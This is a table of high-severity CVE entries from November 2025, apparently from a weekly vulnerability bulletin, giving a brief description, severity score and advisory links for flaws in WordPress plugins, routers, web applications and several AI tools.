| nootheme--Realty Portal | The Realty Portal plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'rp_save_property_settings' function in versions 0.1 to 0.4.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. | 2025-11-21 | 8.8 | CVE-2025-11985 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e8263908-95b3-4b72-a9de-a982618eba2c?source=cve https://plugins.trac.wordpress.org/browser/realty-portal/tags/0.1/includes/property/process/ajax-save-property-setting.php#L189 https://plugins.trac.wordpress.org/browser/realty-portal/tags/0.1/includes/property/process/ajax-save-property-setting.php#L198 https://plugins.trac.wordpress.org/browser/realty-portal/tags/0.1/includes/functions/enqueue.php#L224 https://cwe.mitre.org/data/definitions/862.html https://developer.wordpress.org/reference/functions/current_user_can/   |
| NVIDIA--NVIDIA Isaac-GR00T N1.5 | NVIDIA Isaac-GR00T for all platforms contains a vulnerability in a Python component, where an attacker could cause a code injection issue. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering. | 2025-11-18 | 7.8 | CVE-2025-33183 | https://nvd.nist.gov/vuln/detail/CVE-2025-33183 https://www.cve.org/CVERecord?id=CVE-2025-33183 https://nvidia.custhelp.com/app/answers/detail/a_id/5725   |
| NVIDIA--NVIDIA Isaac-GR00T N1.5 | NVIDIA Isaac-GR00T for all platforms contains a vulnerability in a Python component, where an attacker could cause a code injection issue. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering. | 2025-11-18 | 7.8 | CVE-2025-33184 | https://nvd.nist.gov/vuln/detail/CVE-2025-33184 https://www.cve.org/CVERecord?id=CVE-2025-33184 https://nvidia.custhelp.com/app/answers/detail/a_id/5725   |
| oc3dots--S2B AI Assistant ChatBot, ChatGPT, OpenAI, Content & Image Generator | The S2B AI Assistant - ChatBot, ChatGPT, OpenAI, Content & Image Generator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the storeFile() function in all versions up to, and including, 1.7.8. This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-11-21 | 7.2 | CVE-2025-12973 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ac9d2b64-aff6-418a-bfe7-ec91b177ad6b?source=cve https://plugins.trac.wordpress.org/browser/s2b-ai-assistant/trunk/lib/helpers/Utils.php https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399267%40s2b-ai-assistant&new=3399267%40s2b-ai-assistant&sfp_email=&sfph_mail= https://github.com/d0n601/CVE-2025-12973 https://ryankozak.com/posts/cve-2025-12973/   |
| OpenStack--Keystone | OpenStack Keystone before 26.0.1, 27.0.0, and 28.0.0 allows a /v3/ec2tokens or /v3/s3tokens request with a valid AWS Signature to provide Keystone authorization. | 2025-11-17 | 7.5 | CVE-2025-65073 | https://www.openwall.com/lists/oss-security/2025/11/04/2   |
| Piwigo--Piwigo | Piwigo is a full featured open source photo gallery application for the web. In Piwigo 15.6.0, using the password reset function allows sending a password-reset URL by entering an existing username or email address. However, the hostname used to construct this URL is taken from the HTTP request's Host header and is not validated at all. Therefore, an attacker can send a password-reset URL with a modified hostname to an existing user whose username or email the attacker knows or guesses. This issue has been patched in version 15.7.0. | 2025-11-18 | 8.1 | CVE-2025-62406 | https://github.com/Piwigo/Piwigo/security/advisories/GHSA-9986-w7jf-33f6 https://github.com/Piwigo/Piwigo/commit/9d2565465efc3570963ff431b45cad21610f6692   |
| portabilis--i-educar | i-Educar is free, fully online school management software. In versions 2.10.0 and prior, an authenticated time-based SQL injection vulnerability exists in the ieducar/intranet/agenda.php script. An attacker with access to an authenticated session can execute arbitrary SQL commands against the application's database. This vulnerability is caused by the improper handling of the cod_agenda request parameter, which is directly concatenated into multiple SQL queries without proper sanitization. This issue has been patched in commit b473f92. | 2025-11-19 | 7.2 | CVE-2025-65022 | https://github.com/portabilis/i-educar/security/advisories/GHSA-4hrj-5gwx-r4w4 https://github.com/portabilis/i-educar/commit/b473f92b5326f45d7bce2de93a5381bed7ca8ac7   |
| portabilis--i-educar | i-Educar is free, fully online school management software. In versions 2.10.0 and prior, an authenticated time-based SQL injection vulnerability exists in the ieducar/intranet/funcionario_vinculo_cad.php script. An attacker with access to an authenticated session can execute arbitrary SQL commands against the application's database. This vulnerability is caused by the improper handling of the cod_funcionario_vinculo GET parameter, which is directly concatenated into an SQL query without proper sanitization. This issue has been patched in commit a00dfa3. | 2025-11-19 | 7.2 | CVE-2025-65023 | https://github.com/portabilis/i-educar/security/advisories/GHSA-8rv6-x8h9-fjfc https://github.com/portabilis/i-educar/commit/a00dfa3f129bc84e27873aa01cbd3f82e5b6c6c8   |
| portabilis--i-educar | i-Educar is free, fully online school management software. In versions 2.10.0 and prior, an authenticated time-based SQL injection vulnerability exists in the ieducar/intranet/agenda_admin_cad.php script. An attacker with access to an authenticated session can execute arbitrary SQL commands against the application's database. This vulnerability is caused by the improper handling of the cod_agenda GET parameter, which is directly concatenated into an SQL query without proper sanitization. This issue has been patched in commit 3e9763a. | 2025-11-19 | 7.2 | CVE-2025-65024 | https://github.com/portabilis/i-educar/security/advisories/GHSA-6c8p-xqcv-rghx https://github.com/portabilis/i-educar/commit/3e9763a561b328edaed21a7dc2e0dba0bbbc6e22   |
| premmerce--Premmerce Wholesale Pricing for WooCommerce | The Premmerce Wholesale Pricing for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'ID' parameter in versions up to, and including, 1.1.10. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber level access and above, to manipulate SQL queries that can be used to extract sensitive information from the database and modify price type display names in the database via the admin-post.php "premmerce_update_price_type" action, causing cosmetic corruption of the admin interface. The 'price_type' parameter of the "premmerce_delete_price_type" is also vulnerable. | 2025-11-18 | 7.1 | CVE-2025-12411 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1e4e27e0-bbb0-498a-b425-9e9d60dfed0f?source=cve https://plugins.trac.wordpress.org/browser/premmerce-woocommerce-wholesale-pricing/tags/1.1.10/src/Models/Model.php#L171 https://plugins.trac.wordpress.org/browser/premmerce-woocommerce-wholesale-pricing/tags/1.1.10/src/Admin/Admin.php#L83   |
| projectworlds--Advanced Library Management System | A vulnerability was identified in projectworlds Advanced Library Management System 1.0. This affects an unknown part of the file /delete_admin.php. The manipulation of the argument admin_id leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. | 2025-11-23 | 7.3 | CVE-2025-13572 | VDB-333336 | projectworlds Advanced Library Management System delete_admin.php sql injection VDB-333336 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698645 | projectworlds Advanced Library Management System V1.0 SQL Injection https://github.com/GYSakura/tmp/blob/main/report.md   |
| rajeshsingh520--Live sales notification for WooCommerce | The Live sales notification for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.3.39. This is due to the "getOrders" function lacking proper authorization and capability checks when the plugin is configured to display recent order information. This makes it possible for unauthenticated attackers to extract sensitive customer information including buyer first names, city, state, country, purchase time and date, and product details. | 2025-11-18 | 7.5 | CVE-2025-12955 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1cebcf16-ae7f-45c4-8e1d-80ede4c32106?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394241%40live-sales-notifications-for-woocommerce&old=3389540%40live-sales-notifications-for-woocommerce&sfp_email=&sfph_mail=   |
| Ribose--RNP | In RNP version 0.18.0 a refactoring regression causes the symmetric session key used for Public-Key Encrypted Session Key (PKESK) packets to be left uninitialized except for zeroing, resulting in it always being an all-zero byte array. Any data encrypted using public-key encryption in this release can be decrypted trivially by supplying an all-zero session key, fully compromising confidentiality. The vulnerability affects only public key encryption (PKESK packets).  Passphrase-based encryption (SKESK packets) is not affected. Root cause: Vulnerable session key buffer used in PKESK packet generation. The defect was introduced in commit `7bd9a8dc356aae756b40755be76d36205b6b161a` where initialization logic inside `encrypted_build_skesk()` only randomized the key for the SKESK path and omitted it for the PKESK path. | 2025-11-21 | 7.5 | CVE-2025-13470 | Introducing commit Ubuntu package Arch Linux AUR package Bugzilla report (may become public) https://bugzilla.redhat.com/show_bug.cgi?id=2415863 https://access.redhat.com/security/cve/cve-2025-13402 https://open.ribose.com/advisories/ra-2025-11-20/ https://github.com/rnpgp/rnp/releases/tag/v0.18.1   |
| RooCodeInc--Roo-Code | Roo Code is an AI-powered autonomous coding agent that lives in users' editors. Prior to version 3.26.7, Due to an error in validation it was possible for Roo to automatically execute commands that did not match the allow list prefixes. This issue has been patched in version 3.26.7. | 2025-11-21 | 8.1 | CVE-2025-65946 | https://github.com/RooCodeInc/Roo-Code/security/advisories/GHSA-hwm7-w97p-4h8p https://github.com/RooCodeInc/Roo-Code/pull/7667 https://github.com/RooCodeInc/Roo-Code/commit/b50104cc5987ce64f5154309d967ae8c74cfd1f3   |
| SEIKO EPSON CORPORATION--EPSON WebConfig for SEIKO EPSON Projector Products | EPSON WebConfig and Epson Web Control for SEIKO EPSON Projector Products do not restrict excessive authentication attempts. An administrative user's password may be identified through a brute force attack. | 2025-11-21 | 9.8 | CVE-2025-64310 | https://www.epson.jp/support/misc_t/251120_oshirase.htm https://jvn.jp/en/vu/JVNVU95021911/   |
| Siemens--PS/IGES Parasolid Translator Component | A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions < V29.0.258). The affected applications contains an out of bounds read vulnerability while parsing specially crafted IGS files. This could allow an attacker to crash the application or execute code in the context of the current process. (ZDI-CAN-26755) | 2025-11-17 | 7.8 | CVE-2025-40936 | https://cert-portal.siemens.com/productcert/html/ssa-241605.html   |
| simonhaenisch--md-to-pdf | md-to-pdf is a CLI tool for converting Markdown files to PDF using Node.js and headless Chrome. Prior to version 5.2.5, a Markdown front-matter block that contains JavaScript delimiter causes the JS engine in gray-matter library to execute arbitrary code in the Markdown to PDF converter process of md-to-pdf library, resulting in remote code execution. This issue has been patched in version 5.2.5. | 2025-11-21 | 10 | CVE-2025-65108 | https://github.com/simonhaenisch/md-to-pdf/security/advisories/GHSA-547r-qmjm-8hvw https://github.com/simonhaenisch/md-to-pdf/commit/46bdcf2051c8d1758b391c1353185a179a47a4d9   |
| smackcoders--WP Import Ultimate CSV XML Importer for WordPress | The WP Import - Ultimate CSV XML Importer for WordPress plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 7.33.1. This is due to deserialization of untrusted data supplied via CSV file imports in the import_single_post_as_csv function within SingleImportExport.php. This makes it possible for authenticated attackers, with administrator-level access or higher, to inject a PHP object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. | 2025-11-19 | 7.2 | CVE-2025-13145 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5e441699-4c78-4277-8ac1-f33b810e78cb?source=cve https://plugins.trac.wordpress.org/browser/wp-ultimate-csv-importer/trunk/SingleImportExport.php#L116 https://plugins.trac.wordpress.org/changeset/3397842/wp-ultimate-csv-importer/trunk/SingleImportExport.php   |
| SMCI--MBD-X13SEDW-F | There is a vulnerability in the Supermicro BMC web function at Supermicro MBD-X13SEDW-F. After logging into the BMC Web server, an attacker can use a specially crafted payload to trigger the Stack buffer overflow vulnerability. | 2025-11-18 | 7.2 | CVE-2025-8076 | https://www.supermicro.com/zh_tw/support/security_BMC_IPMI_Nov_2025   |
| SMCI--X13SEDW-F | There is a vulnerability in the Supermicro BMC web function at Supermicro MBD-X13SEDW-F. After logging into the BMC Web server, an attacker can use a specially crafted payload to trigger the Stack buffer overflow vulnerability. | 2025-11-18 | 7.2 | CVE-2025-8727 | https://www.supermicro.com/zh_tw/support/security_BMC_IPMI_Nov_2025   |
| smub--Giveaways and Contests by RafflePress Get More Website Traffic, Email Subscribers, and Social Followers | The Giveaways and Contests by RafflePress - Get More Website Traffic, Email Subscribers, and Social Followers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple social media username parameters in all versions up to, and including, 1.12.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-19 | 7.2 | CVE-2025-12484 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7cda6aad-36e1-45c7-af46-a7b90bb2d339?source=cve https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L539 https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L543 https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L547 https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L551 https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L555 https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L559 https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L563 https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/entry.php#L110 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3398188%40rafflepress&old=3346436%40rafflepress&sfp_email=&sfph_mail=   |
| SolarWinds--Serv-U | A logic error vulnerability exists in Serv-U which when abused could give a malicious actor with access to admin privileges the ability to execute code. This issue requires administrative privileges to abuse. On Windows deployments, the risk is scored as a medium because services frequently run under less-privileged service accounts by default. | 2025-11-18 | 9.1 | CVE-2025-40547 | https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40547 https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-3_release_notes.htm   |
| SolarWinds--Serv-U | A missing validation process exists in Serv U when abused, could give a malicious actor with access to admin privileges the ability to execute code. This issue requires administrative privileges to abuse. On Windows deployments, the risk is scored as a medium because services frequently run under less-privileged service accounts by default. | 2025-11-18 | 9.1 | CVE-2025-40548 | https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40548 https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-3_release_notes.htm   |
| SolarWinds--Serv-U | A Path Restriction Bypass vulnerability exists in Serv-U that when abused, could give a malicious actor with access to admin privileges the ability to execute code on a directory. This issue requires administrative privileges to abuse. On Windows systems, this scored as medium due to differences in how paths and home directories are handled. | 2025-11-18 | 9.1 | CVE-2025-40549 | https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40549 https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-3_release_notes.htm   |
| SourceCodester--Company Website CMS | A vulnerability was found in SourceCodester Company Website CMS 1.0. This affects an unknown part of the file /admin/reset-password.php. The manipulation of the argument email results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. | 2025-11-23 | 7.3 | CVE-2025-13560 | VDB-333325 | SourceCodester Company Website CMS reset-password.php sql injection VDB-333325 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #696637 | sourcecodester Company Website CMS V1.0 SQL InjectionSQL https://github.com/miwangdemaoxianzhe/CVE/issues/1 https://www.sourcecodester.com/   |
| SourceCodester--Company Website CMS | A vulnerability was determined in SourceCodester Company Website CMS 1.0. This vulnerability affects unknown code of the file /admin/index.php. This manipulation of the argument Username causes sql injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. | 2025-11-23 | 7.3 | CVE-2025-13561 | VDB-333326 | SourceCodester Company Website CMS index.php sql injection VDB-333326 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #696684 | sourcecodester Company Website CMS V1.0 SQL InjectionSQL https://github.com/miwangdemaoxianzhe/CVE/issues/2 https://www.sourcecodester.com/   |
| SourceCodester--Online Shop Project | A vulnerability was identified in SourceCodester Online Shop Project 1.0. The affected element is an unknown function of the file /action.php. Such manipulation of the argument Search leads to sql injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2025-11-20 | 7.3 | CVE-2025-13451 | VDB-333021 | SourceCodester Online Shop Project action.php sql injection VDB-333021 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #694674 | SourceCodester Online Shop Project V1.0 SQL Injection https://github.com/xiaojuzirr/cve/issues/4 https://www.sourcecodester.com/   |
| SourceCodester--Train Station Ticketing System | A weakness has been identified in SourceCodester Train Station Ticketing System 1.0. Affected by this vulnerability is an unknown functionality of the file /ajax.php?action=login. This manipulation of the argument Username causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited. | 2025-11-18 | 7.3 | CVE-2025-13344 | VDB-332762 | SourceCodester Train Station Ticketing System ajax.php sql injection VDB-332762 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691940 | SourceCodester Train Station Ticketing System V1.0 SQL Injection https://github.com/puppytgyh/-CVE/issues/14 https://www.sourcecodester.com/   |
| stellarwp--GiveWP Donation Plugin and Fundraising Platform | The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name' parameter in all versions up to, and including, 4.13.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Avatars must be enabled in the WordPress install in order to exploit the vulnerability. | 2025-11-19 | 7.2 | CVE-2025-13206 | https://www.wordfence.com/threat-intel/vulnerabilities/id/95823720-e1dc-46c1-887b-ffd877b2fbe5?source=cve https://plugins.trac.wordpress.org/browser/give/tags/4.11.0/templates/shortcode-donor-wall.php#L59 https://plugins.trac.wordpress.org/browser/give/tags/4.11.0/includes/process-donation.php#L1230 https://plugins.trac.wordpress.org/browser/give/tags/4.11.0/includes/class-give-donor.php#L1135 https://plugins.trac.wordpress.org/changeset/3398128/   |
| Tenda--AC20 | A vulnerability was detected in Tenda AC20 up to 16.03.08.12. The impacted element is an unknown function of the file /goform/WifiExtraSet. The manipulation of the argument wpapsk_crypto results in buffer overflow. The attack can be launched remotely. The exploit is now public and may be used. | 2025-11-17 | 8.8 | CVE-2025-13258 | VDB-332593 | Tenda AC20 WifiExtraSet buffer overflow VDB-332593 | CTI Indicators (IOB, IOC, IOA) Submit #688716 | Tenda AC20 Router Affected firmware version: <= V16.03.08.12 Buffer Overflow https://github.com/DavCloudz/cve/blob/main/Tenda/Tengda%20AC20%20Router%20WifiExtraSet%20Buffer%20Overflow%20Vulnerability.md https://github.com/DavCloudz/cve/blob/main/Tenda/Tengda%20AC20%20Router%20WifiExtraSet%20Buffer%20Overflow%20Vulnerability.md#poc https://www.tenda.com.cn/   |
| Tenda--AC21 | A flaw has been found in Tenda AC21 16.03.08.16. This affects an unknown part of the file /goform/SetIpMacBind. Executing manipulation of the argument list can lead to stack-based buffer overflow. The attack can be executed remotely. The exploit has been published and may be used. | 2025-11-20 | 8.8 | CVE-2025-13445 | VDB-333017 | Tenda AC21 SetIpMacBind stack-based overflow VDB-333017 | CTI Indicators (IOB, IOC, IOA) Submit #694066 | Tenda AC21 V16.03.08.16 Buffer Overflow https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN7.md https://www.tenda.com.cn/   |
| Tenda--AC21 | A vulnerability has been found in Tenda AC21 16.03.08.16. This vulnerability affects unknown code of the file /goform/SetSysTimeCfg. The manipulation of the argument timeZone/time leads to stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. | 2025-11-20 | 8.8 | CVE-2025-13446 | VDB-333018 | Tenda AC21 SetSysTimeCfg stack-based overflow VDB-333018 | CTI Indicators (IOB, IOC, IOA) Submit #694425 | Tenda AC21 V16.03.08.16 Buffer Overflow Submit #694430 | Tenda AC21 V16.03.08.16 Buffer Overflow (Duplicate) https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN8.md https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN9.md https://www.tenda.com.cn/   |
| Tenda--CH22 | A security vulnerability has been detected in Tenda CH22 1.0.0.1. This impacts the function fromPptpUserSetting of the file /goform/PPTPUserSetting. The manipulation of the argument delno leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. | 2025-11-17 | 8.8 | CVE-2025-13288 | VDB-332628 | Tenda CH22 PPTPUserSetting fromPptpUserSetting buffer overflow VDB-332628 | CTI Indicators (IOB, IOC, IOA) Submit #691594 | Tenda Technology Co., Ltd. Tenda V1.0.0.1 Buffer Overflow https://github.com/yyyy1g/CVE/issues/1 https://www.tenda.com.cn/   |
| Tenda--CH22 | A vulnerability was detected in Tenda CH22 1.0.0.1. Affected is the function formWrlExtraGet of the file /goform/WrlExtraGet. Performing manipulation of the argument chkHz results in buffer overflow. Remote exploitation of the attack is possible. The exploit is now public and may be used. | 2025-11-19 | 8.8 | CVE-2025-13400 | VDB-332926 | Tenda CH22 WrlExtraGet formWrlExtraGet buffer overflow VDB-332926 | CTI Indicators (IOB, IOC, IOA) Submit #692145 | Tenda CH22 V1.0.0.1 Buffer Overflow https://github.com/f000x0/cve/issues/14 https://www.tenda.com.cn/   |
| The Browser Company of New York--Dia | This vulnerability allowed a site to enter fullscreen, after a user click, without a full-screen notification (toast) appearing. Without this notification, users could potentially be misled about what site they were on if a malicious site renders a fake UI (like a fake address bar.) | 2025-11-21 | 7.4 | CVE-2025-13132 | https://www.diabrowser.com/security/bulletins#CVE-2025-13132   |
| ThinPLUS--ThinPLUS | ThinPLUS developed by ThinPLUS has an OS Command Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary OS commands and execute them on the server. | 2025-11-17 | 9.8 | CVE-2025-13284 | https://www.twcert.org.tw/tw/cp-132-10512-e196b-1.html https://www.twcert.org.tw/en/cp-139-10513-0d82b-2.html   |
| thorsten--phpMyFAQ | phpMyFAQ is an open source FAQ web application. Prior to version 4.0.14, an authenticated SQL injection vulnerability in the main configuration update functionality of phpMyFAQ allows a privileged user with 'Configuration Edit' permissions to execute arbitrary SQL commands. Successful exploitation can lead to a full compromise of the database, including reading, modifying, or deleting all data, as well as potential remote code execution depending on the database configuration. This issue has been patched in version 4.0.14. | 2025-11-17 | 7.2 | CVE-2025-62519 | https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-fxm2-cmwj-qvx4 https://github.com/thorsten/phpMyFAQ/compare/4.0.13...4.0.14   |
| UTT-- 750W | A security vulnerability has been detected in UTT 进取 750W up to 3.2.2-191225. Affected by this vulnerability is the function system of the file /goform/formPdbUpConfig. Such manipulation of the argument policyNames leads to command injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-20 | 7.3 | CVE-2025-13442 | VDB-333015 | UTT 进取 750W formPdbUpConfig system command injection VDB-333015 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #688782 | UTT (AiTai) Jinqi 750W <=v5v3.2.2-191225 Buffer Overflow https://github.com/alc9700jmo/CVE/issues/20   |
| vllm-project--vllm | vLLM is an inference and serving engine for large language models (LLMs). From versions 0.10.2 to before 0.11.1, a memory corruption vulnerability could lead to a crash (denial-of-service) and potentially remote code execution (RCE), exists in the Completions API endpoint. When processing user-supplied prompt embeddings, the endpoint loads serialized tensors using torch.load() without sufficient validation. Due to a change introduced in PyTorch 2.8.0, sparse tensor integrity checks are disabled by default. As a result, maliciously crafted tensors can bypass internal bounds checks and trigger an out-of-bounds memory write during the call to to_dense(). This memory corruption can crash vLLM and potentially lead to code execution on the server hosting vLLM. This issue has been patched in version 0.11.1. | 2025-11-21 | 8.8 | CVE-2025-62164 | https://github.com/vllm-project/vllm/security/advisories/GHSA-mrw7-hf4f-83pf https://github.com/vllm-project/vllm/pull/27204 https://github.com/vllm-project/vllm/commit/58fab50d82838d5014f4a14d991fdb9352c9c84b   |
| walterpinem--OneClick Chat to Order | The OneClick Chat to Order plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.0.8 via the 'wa_order_thank_you_override' function due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to view sensitive customer information including names, email addresses, phone numbers, billing/shipping addresses, order contents, and payment methods by simply changing the order ID in the URL. | 2025-11-22 | 7.5 | CVE-2025-13526 | https://www.wordfence.com/threat-intel/vulnerabilities/id/547a0c73-044e-49ba-9bec-4f80b41b8ea2?source=cve https://plugins.trac.wordpress.org/browser/oneclick-whatsapp-order/trunk/includes/buttons/wa-order-thank-you.php#L126 https://plugins.trac.wordpress.org/changeset/3391625/   |
| wazuh--wazuh | Wazuh is a free and open source platform used for threat prevention, detection, and response. Prior to version 4.13.0, a vulnerability in Wazuh Agent allows authenticated attackers to force NTLM authentication through malicious UNC paths in various agent configuration settings, potentially leading NTLM relay attacks that would result privilege escalation and remote code execution. This issue has been patched in version 4.13.0. | 2025-11-21 | 7.7 | CVE-2025-30201 | https://github.com/wazuh/wazuh/security/advisories/GHSA-x697-jf34-gp5x https://github.com/wazuh/wazuh/pull/30060 https://github.com/wazuh/wazuh/commit/688972da589e5d40d2a81bcd738240303a3dc45a   |
| Wireshark Foundation--Wireshark | Kafka dissector crash in Wireshark 4.6.0 and 4.4.0 to 4.4.10 allows denial of service | 2025-11-21 | 7.8 | CVE-2025-13499 | https://www.wireshark.org/security/wnpa-sec-2025-06.html GitLab Issue #20823   |
| withastro--astro | Astro is a web framework. Prior to version 5.15.8, a reflected XSS vulnerability is present when the server islands feature is used in the targeted application, regardless of what was intended by the component template(s). This issue has been patched in version 5.15.8. | 2025-11-19 | 7.1 | CVE-2025-64764 | https://github.com/withastro/astro/security/advisories/GHSA-wrwg-2hg8-v723 https://github.com/withastro/astro/commit/790d9425f39bbbb462f1c27615781cd965009f91   |
| wpwham--Checkout Files Upload for WooCommerce | The Checkout Files Upload for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file uploads in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in image files that will execute whenever a user accesses the injected page. | 2025-11-18 | 7.2 | CVE-2025-4212 | https://www.wordfence.com/threat-intel/vulnerabilities/id/09d9785a-db71-4735-b86b-7fa10cf36a0b?source=cve https://plugins.trac.wordpress.org/changeset?old_path=/checkout-files-upload-woocommerce/tags/2.2.1&new_path=/checkout-files-upload-woocommerce/tags/2.2.2   |
| WSO2--WSO2 API Manager | A missing authentication enforcement vulnerability exists in the mutual TLS (mTLS) implementation used by System REST APIs and SOAP services in multiple WSO2 products. Due to improper validation of client certificate-based authentication in certain default configurations, the affected components may permit unauthenticated requests even when mTLS is enabled. This condition occurs when relying on the default mTLS settings for System REST APIs or when the mTLS authenticator is enabled for SOAP services, causing these interfaces to accept requests without enforcing additional authentication. Successful exploitation allows a malicious actor with network access to the affected endpoints to gain administrative privileges and perform unauthorized operations. The vulnerability is exploitable only when the impacted mTLS flows are enabled and accessible in a given deployment. Other certificate-based authentication mechanisms such as Mutual TLS OAuth client authentication and X.509 login flows are not affected, and APIs served through the API Gateway of WSO2 API Manager remain unaffected. | 2025-11-18 | 9.8 | CVE-2025-9312 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2025/WSO2-2025-4494/   |
| WSO2--WSO2 Open Banking AM | A Cross-Site Request Forgery (CSRF) vulnerability exists in multiple WSO2 products due to the use of the HTTP GET method for state-changing operations within admin services, specifically in the event processor of the Carbon console. Although the SameSite=Lax cookie attribute is used as a mitigation, it is ineffective in this context because it allows cookies to be sent with cross-origin top-level navigations using GET requests. A malicious actor can exploit this vulnerability by tricking an authenticated user into visiting a crafted link, leading the browser to issue unintended state-changing requests. Successful exploitation could result in unauthorized operations such as data modification, account changes, or other administrative actions. According to WSO2 Secure Production Guidelines, exposure of Carbon console services to untrusted networks is discouraged, which may reduce the impact in properly secured deployments. | 2025-11-18 | 8.8 | CVE-2025-6670 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2025/WSO2-2025-4117/   |
| zozothemes--Zegen Core | The Zegen Core plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 2.0.1. This is due to missing nonce validation and missing file type validation in the '/custom-font-code/custom-fonts-uploads.php' file. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-21 | 8.8 | CVE-2025-11087 | https://www.wordfence.com/threat-intel/vulnerabilities/id/145deebd-1e15-4f8a-878c-9424c2cd9601?source=cve https://themeforest.net/item/zegen-church-wordpress-theme/25116823   |
| Zyxel--DX3300-T0 firmware | A post-authentication command injection vulnerability in the "priv" parameter of Zyxel DX3300-T0 firmware version 5.50(ABVY.6.3)C0 and earlier could allow an authenticated attacker to execute operating system (OS) commands on an affected device. | 2025-11-18 | 8.8 | CVE-2025-8693 | https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-uncontrolled-resource-consumption-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-11-18-2025   |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
